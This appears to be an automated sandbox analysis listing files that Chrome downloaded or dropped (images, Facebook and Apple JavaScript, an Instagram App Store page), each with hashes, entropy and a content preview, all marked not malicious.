                                                                                                                                                                                                                                  MD5:F06B908907D5D4F2AAF733E2BEE7EA8E
                                                                                                                                                                                                                                  SHA1:073DCF14C7C312BE5DAEB4FA2113429E019FDBC7
                                                                                                                                                                                                                                  SHA-256:583714033CAB0D76045A8D4BBFB2326983F40D5C2CFA239E9527DA9617686E6B
                                                                                                                                                                                                                                  SHA-512:32CABBC903EC76538C30B4734924267BD1364236629ABFB36919CFE4BE498360A6C0D3142BBC8593B8418B807336912E612E56E358993CA80E6F93947E9434D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...4...........t.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs...#...#.x.?v....tIME.......LIJ.....bKGD............&!IDATx.......;qT.$...E..qx.#"(..."!.u%..C0..D....r.(.k.I`...!.G1..M|.....<.%" ....b...35)..{.nUWW.. 3]]}.......D$.../...UW]5n.Q......B.!....z....a.EB...2q..5s........!..BH.f........>|.w...X....C.!..8.c`.'6......w66!..B....I...De.N......=[F..-....N.:.i.....!..B...i........y......E......cY... 18...B.!.D...V&M.T0.&Hj|e.k..&...!..B....i.y.A.%.+...A}..ac.B.!$v........q.3Af0...&..BH...w~..FIh.....B.!..3..-5H....L...B.!$m....'.......y3.!..BH.sj0..)4......$..BHZ@.BQ...q'.sj6!..B.$\(J...h....B.!i.]..+.8.Ah.j...L.!..4..^....3fa..8..0>..#..BH.i...B3y...B..M.n"..BH).;a.v^h.!....|.."..BHZ.1b..Q..g.*....B.!...wM..g..?C.!..BH)M...B.!.BC.!..B.!..B....B.!.BC.!..B....B.!.BC.!..B.!..B...BC2GMM..5K.-[&.7o..>......O>)#G....J.}...L....}.6......B..s........w.}.r.J.c.............*~....D.I.c..I...$....t..r..rh.&<.e.:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (750)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2169
                                                                                                                                                                                                                                  Entropy (8bit):4.9548772147686115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:ildRbgqluYoCoLUmledemlxUlIUvfALSAl/lmmqlmWlfBlAlVlWlgwheAYf9hbF5:INx4gd/d4fTvsaMefp5oD
                                                                                                                                                                                                                                  MD5:89F8EE167E82FADB507197C109ED684B
                                                                                                                                                                                                                                  SHA1:F5A728E7805C71BAE1A8786921AB2735AB07C15E
                                                                                                                                                                                                                                  SHA-256:0B70D5380DCC5A0C4BDD30DE4D68C4B0F598EB4EA92BEEC1B6D5F0852BD96D22
                                                                                                                                                                                                                                  SHA-512:BC12D7CB827E364176A691C2ED5C73A481547C572A0C00E5FF6B8BD8E698AC7DA96F2D8DA08485F9363F98A1F21338E61A9E813A31DF0A2EB7E96D43A902E5CE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[961],{54961:function(n,e,t){t.r(e),t.d(e,{cleanup:function(){return c},environment:function(){return o},eventQueue:function(){return i},eventRecorder:function(){return r},immediateEventRecorder:function(){return u}}).var i=t(71026),o={_document:function(){if("undefined"!=typeof document)return document.throw"metricskit-delegates-html.environment HTML delegate 'document' object not found"},_window:function(){if("undefined"!=typeof window)return window.throw"metricskit-delegates-html.environment HTML delegate 'window' object not found"},cookie:function(){return o._window().document.cookie},pageUrl:function(){return o._window().location.href},parentPageUrl:function(){var n,e=o._window(),t=e.parent.if(t!==e)try{n=t.location.href}catch(e){n=o._document().referrer}return n},pixelRatio:function(){return o._window().devicePixelRatio},screenHeight:function(){return o._window().screen.height},scre
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1166
                                                                                                                                                                                                                                  Entropy (8bit):7.735918507899989
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:g5EUazC4GX798OlvP0/yMuEksRGji68ZlMbpQuSXBKJV/ZAjzq1wQ:g5EUazBGaOlX0/yMuERJ6OOdQ3XBKH19
                                                                                                                                                                                                                                  MD5:07B4B8D813DCCCA19882CCEEE4672C0F
                                                                                                                                                                                                                                  SHA1:60D8F41AD43D11459AB8251DC7A500EB94C6DB91
                                                                                                                                                                                                                                  SHA-256:0C9D1927164F066BFAC4236A6C6D7E2027782C7EEC8F187BE4EB160AECBFA4EA
                                                                                                                                                                                                                                  SHA-512:0387700D9280EF08BF229701DB7534DEF98FF57491F35F364617B930CF0323369085EDB2C82FE9084F070F9807A616EBDF00B47EEE8E50E6908B8E445A20A71D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/XRDaSYtkE4CmnsfdfgH7CGPmqCDJmeu-h1_J0qwXeHn5yu4NpZWyGRN60yDRYS_wVwg=s48-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X......../../..VP8 >........*0.0.>e$.F."!!<`...l..2.u..y.W.R.z..m..~.~.{.zG....n.E.......^$x..4.n...,.M.MD..*.g.4>....%....k3.z.....B..z[;..<......Jg..K....:...T......+KN..@.:..v.Y..5......<..<..r3.M.Z.t.7Nsz3k.O........t.s...V...m...R..^.E..?~.:%3.G'....1L.=.O....m.....C........rh.RG..!..k....S...K....Y.......,.....L\.#..=u..,...s)P.....1..n..7"..m....2.@.F.X9`.......:NL2..in...c......*.X.Y....2.z.c...T.&.8.R....@X..?.I....gRW.Q.0.g. .?.:...p>r....J..0'5..W-vr...l[m.4U.ig4x..2...nE.qK.......W.....\.[..v.D.S....-qw...,.U...r....RK1.b..exi...U}A._N.*..~.v.J...uN..W.._w.}..B,Y|-.......M....8[.Vp...sr..7g..&..u.`.S.[./..;"........w......\.#..S..4K........O:<...z.|.,J.F?m... ...j/...$.}...yU.llF.Hp.....G..uB..3...#lkh.>D.*mJ..ee..w...^.......c.y..&<.....0.s.0..6'.f.;.4.7...^.u...k.y,<.:........{W......*x...#...!@..{f%...Zp.q.Bn:..a.:.u..l~..o..u..}.......v...bl........b..w....W.<&@.[..<..).......K;f.8_...}}.n..0........a.......vV..Q7g..U.Ark...p
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17932)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):18154
                                                                                                                                                                                                                                  Entropy (8bit):4.913619694300307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:7YNwwESzQnZKETYN2COZYcUBQA4LxWm3CKgB+2RR:yhNzrXNAtU9ArbM+AR
                                                                                                                                                                                                                                  MD5:73111912F4B4F7A5B5501DC74D50025B
                                                                                                                                                                                                                                  SHA1:94BAE7BE09CAE37C16321425B151EB0DE4592F0D
                                                                                                                                                                                                                                  SHA-256:AB6777F622DCE53EFA7D6A93432292AFBA7757445EB4CC111B25810882375B98
                                                                                                                                                                                                                                  SHA-512:DB7A6BF34BD0E3C739917EAD6BC24D31B63420498476756E99AAB232F7D14A9D0A86DD90764440089B66B2D544A327884F17B566DD02EB783360DA749789B738
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(this.mode=c),this.sBox0=a.sBox0.slice(),this.sBox1=a.sBox1.slice(),this.sBox2=a.sBox2.slice(),this.sBox3=a.sBox3.slice(),this.pArray=a.pArray.slice(),this.generateSubkeys(b)};a.prototype={sBox0:null,sBox1:null,sBox2:null,sBox3:null,pArray:null,key:null,mode:"ecb",iv:"abc12345",keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encrypt:function(a,b){if(this.mode==="ecb")return this.encryptECB(a);if(this.mode==="cbc")return this.encryptCBC(a,b);throw new Error("\u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0440\u0435\u0436\u0438\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f.")},decrypt:function(a,b){if(this.mode==="ecb")return this.decryptECB(a);if(this.mode==="cbc")retur
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):13436
                                                                                                                                                                                                                                  Entropy (8bit):7.867534925657486
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:WF0VSb7BFEdnLvlH6cOLr7H2T9lvIvvqlhHAw1CEZi8z13tK/TEVWf3Hhdftx2t1:hMXcNH6c22TJL1CE7K/TE63hdF4OW
                                                                                                                                                                                                                                  MD5:6C4DF94396ED09B0AE1B239F2A59936F
                                                                                                                                                                                                                                  SHA1:ED118E0F96B62350789012829FA3774ED2EB7DD1
                                                                                                                                                                                                                                  SHA-256:7D23976AA96D4AB304D0B86253FA4009C25C3B74E114D07F70FE6247451B2682
                                                                                                                                                                                                                                  SHA-512:3BEDF7C1DE2B1B69D999E121A2A4B2F0C7CFC0DDF1573A481B26B45C2804796AFAAA4777C75E87B951B6C09B42004799164535D85C8E140A4A9A83B43E352D25
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/pvJWQoLSWLo/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF................................... %.%%./'10-'-+5=PB58K9--EaEKSV[\[2AemdXlPY[W......./..-W65=WWWWWWWWWWWWWWWWWWWWW]WWWWWWWWWWWWWWWWWWWWWWWW_WcW......h....".......................................C........................!1AQ..."Raq........2B.....#3Sb.Cr..T.%4.$..............................(........................!Q1A.R."a..2B.............?..........................................................................................................................................................r......a....i.[.q7..wC....4>-..T.J....vj...:.f......l.....,....vS..^....y1.lp7W.LC...........T..}..1.....s.Z.._._H{._.K.K........0...W..._H{._.K.............uk..s......../.v..~G....s.j..\...j..\...~......m.._.K....^.~.9}#......1...^.~.9}!.~..r.Gk?G...b...~..r.E..~..r.Gk?G......v+..s....W.../.v..w...f(.^.W.../@.b.~.9z..~.....(.^.W.../@.f.~.9z..~.......k...\......../B.s.w...@..f.~.9z..5.........?lP6....\..YO."N.t~2..;Y.Y..~. z..cq1Ws...../.....T..8.Kyp.5......T..{._.K......w..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37912
                                                                                                                                                                                                                                  Entropy (8bit):7.994395927835498
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:nZmTYtorWZ8SfDb1frUxnADCh54zfaQ/EoxCjZoyZLdVph5oj/:nZSYtycDZonhh54zfaVjRZ5VD27
                                                                                                                                                                                                                                  MD5:9412333F64366A0DE0D4627CA7621438
                                                                                                                                                                                                                                  SHA1:C0B9A4AA7A050CDD7CD6D1677050650CB2848584
                                                                                                                                                                                                                                  SHA-256:4B31A4DF1829C4B2C7B545AFEA87A84FFBBAFA01DB8A9F404E5BEA8E7344E2EA
                                                                                                                                                                                                                                  SHA-512:2EA6C5566DEB497423D2BEDC517EB8A455979C1E82FB9285A70EA97F51C673C646E8D95CF8C762B732C1E8952D66B5004FC51F2CBB1B55CE49E34F7EDDEF876B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8 ....0x...*..(.>y,.F..!.49.....j...h.i.3#./......7...}../..pv..7.._..?....}....sz..........w.G..._P.._.o...2.......w.'.c.w...../.........?..i.....G....S..z...._......[.[.}~...7...?..#...-..._....a.;...G.?.z...h.......;..................C.._p......~j~..E......................._..,.......o.'./........~...W...g.............w...K./.....e.g..2........./. ...C@...pf....R$..G..f."..`Js...|FN]~...Q..E...wA...P(g..m...b....Vp.O.}+.L.q.....O.Wo|[[- ..g+bC.z0Yw.8O.....x....C..#J,.....G....|...<.3=.'.B..?4c...]A,.~|...1..1....[{..|.....;...b..w*..N...6..W-5.p.w..v%.7~..*P.!S.G.|!..B.....w)..i..h.F_...'|....`.)... ;."$....T....`.*.&.X....&B7$...'.%eh...F$..L..@....Itg..._..... q....a..#E...J........7...B.......}A...J....W......*................: s.t.GMLADU.z...Hx....41.c......o.^.Fi'.....j.=....K.8m..."....c+....L......=.'..a......p..q....r..3.0i..yO...lcO....bh.g.y.A.....S.>.G_..........!.r"u.{.dy.t. ..n. .:.a..i.~...8....!..4..:DS.kf|q..1.@M
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6999)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):34922
                                                                                                                                                                                                                                  Entropy (8bit):5.359620627574951
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:so/MPtWU9Ywx3UpxbY/Y3YOgQxnYeYZYHYZYVY+YEHVIVIVeVoVeVjVDVjVjVMV9:RIT7hsZwuvLN54WAcl5100eUeZ5ZZAK+
                                                                                                                                                                                                                                  MD5:15710A1D3C11151B3EAC2EC844FA03DD
                                                                                                                                                                                                                                  SHA1:C79A4AC27A1E3017BBEC229031ED4A9976D26A15
                                                                                                                                                                                                                                  SHA-256:27928DD5441B4297F3B11F51CBEC9298F03B891224C706574BE55E7284CE9B8A
                                                                                                                                                                                                                                  SHA-512:09AA6213CF12B51A701E4FB6C74C1105DC67422EC9CED201DEC01DC271548EAD020DE95F757DF0AE5FD7BE62F8D19C26193EEFD0BF4744F858678EE89D6C93C4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (3256)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):30189
                                                                                                                                                                                                                                  Entropy (8bit):5.396190125614001
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:kAEuymY99x3Yx9YXMAuzwqxaf4XByCL0xkc:P3i37T7FQ0CL0xp
                                                                                                                                                                                                                                  MD5:56B7FCA02CFACE9E71C2AE38EB25AFE1
                                                                                                                                                                                                                                  SHA1:D7A4B3ADAE9B1619379EFE66711B2DAC7B3F8F45
                                                                                                                                                                                                                                  SHA-256:0D410C6C2E55A84B012837257DD6239044DB1621E0F6DE52EA4E332E898F8E34
                                                                                                                                                                                                                                  SHA-512:EE93C53CAA66B8176631F44507B5A7FE7130093CD4EBB6083CB8866703E39030CEE10C97EF9E993FBD589F77F3FAFF3405C738289D7BD67D44E5E17F2BFDD038
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iPiP4/ye/l/en_GB/V4hH0O2u6X-.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("LynxGeneration",["LinkshimHandlerConfig","URI"],(function(a,b,c,d,e,f,g){var h,i=new(h||(h=c("URI")))(c("LinkshimHandlerConfig").linkshim_path).setDomain(c("LinkshimHandlerConfig").linkshim_host),j={getShimURI:function(){return new(h||(h=c("URI")))(i)},getLynxURIProtocol:function(a){return c("LinkshimHandlerConfig").always_use_https?"https":a.getProtocol()==="http"?"http":"https"},getShimmedHref:function(a,b,d){var e;a=new(h||(h=c("URI")))(a);var f=j.getLynxURIProtocol(a);a=j.getShimURI().setQueryData((e={},e[c("LinkshimHandlerConfig").linkshim_url_param]=a.toString(),e[c("LinkshimHandlerConfig").linkshim_enc_param]=b,e)).setProtocol(f);b=d==null?void 0:d.trackingNodes;e=d==null?void 0:d.callbacks;b&&b.length&&(a=a.addQueryData("__tn__",b.join("")));e&&e.length&&(a=a.addQueryData("c",e));return a}};a=j;g["default"]=a}),98);.__d("NonFBLinkReferrerProtector",["$","LinkshimHandlerConfig","Parent","URI","cr:5662","setTimeout"],(function(a,b,c,d,e,f){"use strict";var
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):140
                                                                                                                                                                                                                                  Entropy (8bit):5.195274886068422
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:+u0T3+Dr7ScTQPvmV1K8RAsvWzlInKadeNK52b:RMe/bakKAAsuUKadeY52b
                                                                                                                                                                                                                                  MD5:23F88E284442DA3273D32F8EF43E1C04
                                                                                                                                                                                                                                  SHA1:7616F3C3D7CEA42AE9FDE2A9D9D292F6F98B413C
                                                                                                                                                                                                                                  SHA-256:4EC6B501CBA0B20C832399BF60EF95C8BE1A383167F8CF99D837D7DE61E5B724
                                                                                                                                                                                                                                  SHA-512:03A51FC8D36C051575295876086751789F39DB321651F1559F4D0668069FED25D50F8E812F758B382B254D58BF9CD186FFE9386A3A290B0284CB1A2942EC4F47
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwkbMnFS9SzlUhIFDYOoWz0SBQ3Fk8QkEiUJ_BMmCEAc3rsSBQ3VLTVEEgUNkWGVThIFDTwvUGESBQ2RYZVO?alt=proto
                                                                                                                                                                                                                                  Preview:CkEKDQ2DqFs9GgQIVhgCIAEKMA3Fk8QkGgQISxgCKiMIClIfChVAIS4jJCpfLSY/KyUvLF4pOj18figQARj/////DwokCgcN1S01RBoACgcNkWGVThoACgcNPC9QYRoACgcNkWGVThoA
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10070
                                                                                                                                                                                                                                  Entropy (8bit):7.9735241994969
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:nJ2qhBr+ro1Q67Lxp9i2D2FT/KMCghBP2SKi1Jm5iMEYbKPJjhafc6WuogtJLrR:pLQ8Zp6FTG+cAYbCJVafc6ZogTJ
                                                                                                                                                                                                                                  MD5:D3B1947056DDCA3E7F65C178BB17B96E
                                                                                                                                                                                                                                  SHA1:CACEDCEAD9F4E9BA36485217EF54C96C4C682C57
                                                                                                                                                                                                                                  SHA-256:BE9D202F5B6B0FD323E40CA24ACB93AE0D736802529070E8ADDABB2732780F0F
                                                                                                                                                                                                                                  SHA-512:2CCFAE55A1569FCAA97D42A4FBCB8DF9D17755C9C8E72FE1FCA42E68FB40016AC5081AEEF29DD8D2B21E4A1F32BD03245613C819841CB678FDF4F61DB75395ED
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/j30yV01OUMEhaI4qDdl3LDL3aXKq3aNm_4mImGzNxTkPAVCa6D9cKvkMTh0UwEnJvj4=s64-rw
                                                                                                                                                                                                                                  Preview:RIFFN'..WEBPVP8X........?..?..VP8L.'../?...M0h.H.%..w..>........\......3..=.[.a......F...N.`...1.4.8.4.....I....L...$).=...........XKe...l..{]=C'oN......D..'..e.^.@A.)...r.7.|...R...F.9.....|..B.........,.P. 2.,...T&V..^..gS.s0..m..?.m?........C......o.m...?+..1.j...c...58N.m.........;m.M..N~.%..)n#..SU].V."K.d+.!N.;..33.2333.._f.,3op`1.!.8.c.-Y,u....o.)R.m.!U-....!.....z......?w......^.;7.rZ. '...0.3.Uu.....m#I..."%.x.....bR....`3.gC.....x.Z.I.i.m[.U.9.>.w..2J..R..C.(d4.@#&.......Um.k.{?.!....I)G.$bP............nq....7?....8..~..N.$D.]l)g.X...7.7..66.....OF/y.......-...._....j.....Df-R.?J,..cQ#.G.V.Rm.W....=5...X....R....i.|1...3O.<..f0.".*..z4.d.=........7&.}5..~..R.....po.;..].t"b.rH.....@AH.<.>.o...n..K='_^.>.7...L...j.gW....Qc.rAe..!W..^Zv.rQ..p....$^.S.X..-.......;...h!..F3+..O....{....C.;j.E'mR.-..e.T|...FL?q..... <.R.H.$.o..o.'.S.HK.rP4U.bP..G...3.-L.Q..3.....u_h.....mU.lr.j....!..1Q.h>..._Yl....."h..V=.?..k.......gsa.]w......:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12570)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):110588
                                                                                                                                                                                                                                  Entropy (8bit):5.284527927126575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:dgxM88ofq9SwUu3aLYDfxnCFhRhpfvvrTxbM2Zgs1Keypi:OOJolwUmhC/RPfBD1Kemi
                                                                                                                                                                                                                                  MD5:04BBACBF1A57E9D2BD0EA3D9A0D51358
                                                                                                                                                                                                                                  SHA1:586A99D75A4A0EEFBE18D616DF5B9FACF84B5D4E
                                                                                                                                                                                                                                  SHA-256:F31A9F9C6587ECF268F553462016F2E3E335BE3A83C0C167E391BA5B7FC58092
                                                                                                                                                                                                                                  SHA-512:17DA648EB102098F27FA801A859C81A01F9B76630B1274DCF760A8509682942C67BD28527471256668B47AE710F8C9BE67494AF5E4974E68831918BFDD332F3D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iCwx4/yZ/l/en_GB/HZi4Ht9U6gq.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ARIA",["DOM","emptyFunction","ge","getOrCreateDOMID","joinClasses"],(function(a,b,c,d,e,f,g){var h,i,j=function(){h=c("ge")("ariaAssertiveAlert"),h||(h=c("DOM").create("div",{id:"ariaAssertiveAlert",className:c("joinClasses")("accessible_elem","accessible_elem_offset"),"aria-live":"assertive"}),c("DOM").appendContent(document.body,h)),i=c("ge")("ariaPoliteAlert"),i||(i=h.cloneNode(!1),i.setAttribute("id","ariaPoliteAlert"),i.setAttribute("aria-live","polite"),c("DOM").appendContent(document.body,i)),j=c("emptyFunction")};function k(a,b){j();b=b?h:i;c("DOM").setContent(b,a)}function a(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-controls",f)}function b(a){for(var b=arguments.length,d=new Array(b>1?b-1:0),e=1;e<b;e++)d[e-1]=arguments[e];var f=d.map(function(a){return c("getOrCreateDOMID")(a)}).join(" ");a.setAttribute("aria-describedby",
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (26358)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):799835
                                                                                                                                                                                                                                  Entropy (8bit):5.532038526722017
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Eb8r+JY5qRwyeqyyO6wzXPxdaHXHjvNi6ScwOt8NQtj84jhfX9N4N85qdNIS1Bp3:hyMoj84jhfETy64zwuc0rXlxs
                                                                                                                                                                                                                                  MD5:3BCF65A9F70F04BC976D1E78D611C8B8
                                                                                                                                                                                                                                  SHA1:073937B502DC86DD2C2C0935B9B6F8F37F687294
                                                                                                                                                                                                                                  SHA-256:853CEC1FB0436FBC386B2E2A11401234F34F372CDDC2B0EFB8065413D023ED2B
                                                                                                                                                                                                                                  SHA-512:791552EFE0101686E47D1538C5366190E0BFE43435B492BF9D6C1C740815A9BD179D303067E7A93436B7ED5C68EE71CD9CF279B20B969C3014624A97DDE0F2E9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/uz/app/instagram/id389801252
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html dir="ltr" lang="en-GB"><head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">. <meta name="applicable-device" content="pc,mobile">.. <script id="perfkit">window.initialPageRequestTime = +new Date();</script>. <link rel="preconnect" href="https://amp-api-edge.apps.apple.com" crossorigin="">.<link rel="preconnect" href="https://is1-ssl.mzstatic.com" crossorigin="">.<link rel="preconnect" href="https://is2-ssl.mzstatic.com" crossorigin="">.<link rel="preconnect" href="https://is3-ssl.mzstatic.com" crossorigin="">.<link rel="preconnect" href="https://is4-ssl.mzstatic.com" crossorigin="">.<link rel="preconnect" href="https://is5-ssl.mzstatic.com" crossorigin="">.<link rel="preconnect" href="https://xp.apple.com" crossorigin="">.<link rel="preconnect" href="https://js-cdn.music.apple.com" crossorigin="">.<link rel="preconnect" href="
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5770)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):805295
                                                                                                                                                                                                                                  Entropy (8bit):5.622073916864526
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:5gI/dB/0dAlgEAOJ4JwwcFPh/0aTEwb3iZbeeseJ7aS8+vgAieOKSqzT9E/qWWOl:5gI/dB/0dAlgEAOJ4JwwcFPh/0aTEwbL
                                                                                                                                                                                                                                  MD5:602D32012CA66BE8A01A878441BE6153
                                                                                                                                                                                                                                  SHA1:33BD3931ACD1791EE8A6638674B03D1C9BF08304
                                                                                                                                                                                                                                  SHA-256:69317E53799DFB49D64723E4648A2E863B843D538650C41C210577B66AD727DE
                                                                                                                                                                                                                                  SHA-512:1E7DFFCE6C4202069D38B5D4A59C56B31A2748586AC3A591573BCED7213341B76F26D229E50187C821C87EBE219EE0D625A78B5730F13BF16F28E47A153BF353
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
